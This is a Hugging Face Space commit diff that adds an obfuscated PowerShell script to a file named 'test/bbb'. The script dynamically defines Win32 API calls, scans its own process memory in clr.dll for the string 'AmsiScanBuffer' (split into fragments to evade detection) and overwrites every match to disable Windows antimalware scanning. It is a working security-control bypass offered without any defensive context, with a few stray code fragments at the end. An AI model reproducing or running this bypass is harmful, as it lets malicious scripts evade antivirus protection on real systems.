Hugging Face's logo

Spaces:
enotkrutoy
/
gggg
Runtime error

App Files Community
enotkrutoy commited on
Commit
3e31935
·
verified ·
1 Parent(s): 5932dcc

Update test/bbb

Browse files
Files changed (1) hide show
  1. test/bbb +162 -1
test/bbb CHANGED
@@ -1,3 +1,164 @@
1
- https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/a
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
2
  $n::$m($s, $i, $d, $l)
3
  $count
 
1
+ $PAGE_READONLY = 0x02
2
+ $PAGE_READWRITE = 0x04
3
+ $PAGE_EXECUTE_READWRITE = 0x40
4
+ $PAGE_EXECUTE_READ = 0x20
5
+ $PAGE_GUARD = 0x100
6
+ $MEM_COMMIT = 0x1000
7
+ $MAX_PATH = 260
8
+
9
+ # Helper functions
10
+ function IsReadable {
11
+ param ($protect, $state)
12
+ return ((($protect -band $PAGE_READONLY) -eq $PAGE_READONLY -or ($protect -band $PAGE_READWRITE) -eq $PAGE_READWRITE -or ($protect -band $PAGE_EXECUTE_READWRITE) -eq $PAGE_EXECUTE_READWRITE -or ($protect -band $PAGE_EXECUTE_READ) -eq $PAGE_EXECUTE_READ) -and ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD -and ($state -band $MEM_COMMIT) -eq $MEM_COMMIT)
13
+ }
14
+
15
+ function PatternMatch {
16
+ param ($buffer, $pattern, $index)
17
+ for ($i = 0; $i -lt $pattern.Length; $i++) {
18
+ if ($buffer[$index + $i] -ne $pattern[$i]) {
19
+ return $false
20
+ }
21
+ }
22
+ return $true
23
+ }
24
+
25
+ if ($PSVersionTable.PSVersion.Major -gt 2) {
26
+
27
+
28
+ # Create module builder
29
+ $DynAssembly = New-Object System.Reflection.AssemblyName("Win32")
30
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
31
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)
32
+
33
+ # Define structs
34
+ $TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
35
+ [void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
36
+ [void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
37
+ [void]$TypeBuilder.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
38
+ [void]$TypeBuilder.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
39
+ [void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
40
+ [void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
41
+ [void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
42
+ $MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()
43
+
44
+ # Define structs
45
+ $TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
46
+ [void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
47
+ [void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
48
+ [void]$TypeBuilder.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
49
+ [void]$TypeBuilder.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
50
+ [void]$TypeBuilder.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
51
+ [void]$TypeBuilder.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
52
+ [void]$TypeBuilder.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
53
+ [void]$TypeBuilder.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
54
+ [void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
55
+ [void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
56
+ [void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
57
+ $SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
58
+
59
+ # P/Invoke Methods
60
+ $TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
61
+ $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
62
+ $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
63
+ $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
64
+
65
+ # Define [Win32.Kernel32]::VirtualProtect
66
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
67
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
68
+
69
+ # Define [Win32.Kernel32]::GetCurrentProcess
70
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
71
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
72
+
73
+ # Define [Win32.Kernel32]::VirtualQuery
74
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
75
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
76
+
77
+ # Define [Win32.Kernel32]::GetSystemInfo
78
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
79
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
80
+
81
+ # Define [Win32.Kernel32]::GetMappedFileName
82
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
83
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
84
+
85
+ # Define [Win32.Kernel32]::ReadProcessMemory
86
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
87
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
88
+
89
+ # Define [Win32.Kernel32]::WriteProcessMemory
90
+ $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
91
+ $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
92
+
93
+ $Kernel32 = $TypeBuilder.CreateType()
94
+
95
+ $a = "Ams"
96
+ $b = "iSc"
97
+ $c = "anBuf"
98
+ $d = "fer"
99
+ $signature = [System.Text.Encoding]::UTF8.GetBytes($a + $b + $c + $d)
100
+ $hProcess = [Win32.Kernel32]::GetCurrentProcess()
101
+
102
+ # Get system information
103
+ $sysInfo = New-Object Win32.SYSTEM_INFO
104
+ [void][Win32.Kernel32]::GetSystemInfo([ref]$sysInfo)
105
+
106
+ # List of memory regions to scan
107
+ $memoryRegions = @()
108
+ $address = [IntPtr]::Zero
109
+
110
+ # Scan through memory regions
111
+ while ($address.ToInt64() -lt $sysInfo.lpMaximumApplicationAddress.ToInt64()) {
112
+ $memInfo = New-Object Win32.MEMORY_INFO_BASIC
113
+ if ([Win32.Kernel32]::VirtualQuery($address, [ref]$memInfo, [System.Runtime.InteropServices.Marshal]::SizeOf($memInfo))) {
114
+ $memoryRegions += $memInfo
115
+ }
116
+ # Move to the next memory region
117
+ $address = New-Object IntPtr($memInfo.BaseAddress.ToInt64() + $memInfo.RegionSize.ToInt64())
118
+ }
119
+
120
+ $count = 0
121
+
122
+ # Loop through memory regions
123
+ foreach ($region in $memoryRegions) {
124
+ # Check if the region is readable and writable
125
+ if (-not (IsReadable $region.Protect $region.State)) {
126
+ continue
127
+ }
128
+ # Check if the region contains a mapped file
129
+ $pathBuilder = New-Object System.Text.StringBuilder $MAX_PATH
130
+ if ([Win32.Kernel32]::GetMappedFileName($hProcess, $region.BaseAddress, $pathBuilder, $MAX_PATH) -gt 0) {
131
+ $path = $pathBuilder.ToString()
132
+ if ($path.EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) {
133
+ # Scan the region for the pattern
134
+ $buffer = New-Object byte[] $region.RegionSize.ToInt64()
135
+ $bytesRead = 0
136
+ [void][Win32.Kernel32]::ReadProcessMemory($hProcess, $region.BaseAddress, $buffer, $buffer.Length, [ref]$bytesRead)
137
+ for ($k = 0; $k -lt ($bytesRead - $signature.Length); $k++) {
138
+ $found = $True
139
+ for ($m = 0; $m -lt $signature.Length; $m++) {
140
+ if ($buffer[$k + $m] -ne $signature[$m]) {
141
+ $found = $False
142
+ break
143
+ }
144
+ }
145
+ if ($found) {
146
+ $oldProtect = 0
147
+ if (($region.Protect -band $PAGE_READWRITE) -ne $PAGE_READWRITE) {
148
+ [void][Win32.Kernel32]::VirtualProtect($region.BaseAddress, $buffer.Length, $PAGE_EXECUTE_READWRITE, [ref]$oldProtect)
149
+ }
150
+ $replacement = New-Object byte[] $signature.Length
151
+ $bytesWritten = 0
152
+ [void][Win32.Kernel32]::WriteProcessMemory($hProcess, [IntPtr]::Add($region.BaseAddress, $k), $replacement, $replacement.Length, [ref]$bytesWritten)
153
+ $count++
154
+ if (($region.Protect -band $PAGE_READWRITE) -ne $PAGE_READWRITE) {
155
+ [void][Win32.Kernel32]::VirtualProtect($region.BaseAddress, $buffer.Length, $region.Protect, [ref]$oldProtect)
156
+ }
157
+ }
158
+ }
159
+ }
160
+ }
161
+ }
162
+ }
163
  $n::$m($s, $i, $d, $l)
164
  $count